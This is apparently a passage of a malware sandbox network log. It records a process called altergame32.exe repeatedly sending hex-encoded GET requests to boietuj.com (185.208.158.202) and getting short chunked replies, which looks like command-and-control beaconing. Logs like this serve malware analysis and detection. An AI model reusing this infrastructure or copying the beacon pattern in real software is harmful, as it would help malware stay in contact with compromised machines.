                                                                Nov 20, 2024 05:03:46.790327072 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:47.498078108 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.450033185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:47.620803118 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:48.354685068 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.450034185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:48.479300976 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:49.183340073 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.450035185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:49.305936098 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:50.006700039 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.450036185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:50.135117054 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:50.849473000 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:50.956752062 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:51.338821888 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.450037185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:51.462987900 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:52.189471960 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:52.300765038 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:52.550549030 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:52.660830021 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:52.911196947 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:53.019896030 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:53.274570942 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.450038185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:53.399975061 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:54.114866972 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:54.222429991 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:54.469738960 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:54.582773924 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:54.962649107 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.450039185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:55.088346958 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:55.796256065 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.450040185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:55.915716887 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:56.638695955 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.450041185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:56.760502100 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:57.469749928 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.450042185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:58.039854050 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:58.719826937 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.450043185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:58.851417065 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:59.577845097 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.450044185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:59.701590061 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:00.427445889 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:00 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                41192.168.2.450045185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:00.581823111 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:01.290733099 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.450046185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:01.695470095 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:02.423727036 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:02 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:04:02.542746067 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:02.792447090 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:02 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                43192.168.2.450047185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:02.922924995 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:03.640023947 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                44192.168.2.450048185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:03.760540009 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:04.467097044 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                45192.168.2.450049185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:04.589704037 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:05.296166897 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:05 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                46192.168.2.450050185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:05.562829018 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:06.232191086 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
